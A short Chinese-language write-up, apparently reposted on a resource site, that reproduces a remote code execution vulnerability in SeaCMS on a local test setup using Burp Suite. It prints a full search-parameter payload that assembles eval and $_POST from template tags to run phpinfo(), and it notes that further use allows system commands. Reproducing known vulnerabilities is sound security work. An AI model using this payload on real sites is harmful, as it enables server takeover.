mysql+php 用phpstudy即可
下载好之后开始搭建, 将uploads里的所有文件复制到网站服务器中
包里有安装说明
0x01 开始复现
安装完毕后进入主页
设置代理127.0.0.1 8080端口, 打开BurpSuite抓包
这里直接用网上的poc
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
我们复制过来看看效果
改好直接forward 过我们看下效果
0x02 漏洞利用
进一步利用,可以执行系统命令
上一篇:没有了
下一篇:海洋cms播放器无法全屏解决方法
郑重声明:
本站所有内容均由互联网收集整理、网友上传,并且以计算机技术研究交流为目的,仅供大家参考、学习,不存在任何商业目的与商业用途。
若您需要商业运营或用于其他商业活动,请您购买正版授权并合法使用。
我们不承担任何技术及版权问题,且不对任何资源负法律责任。
如无法下载,联系站长索要。
如有侵犯您的版权,请给我们来信:admin@cniao8.com,我们尽快处理。
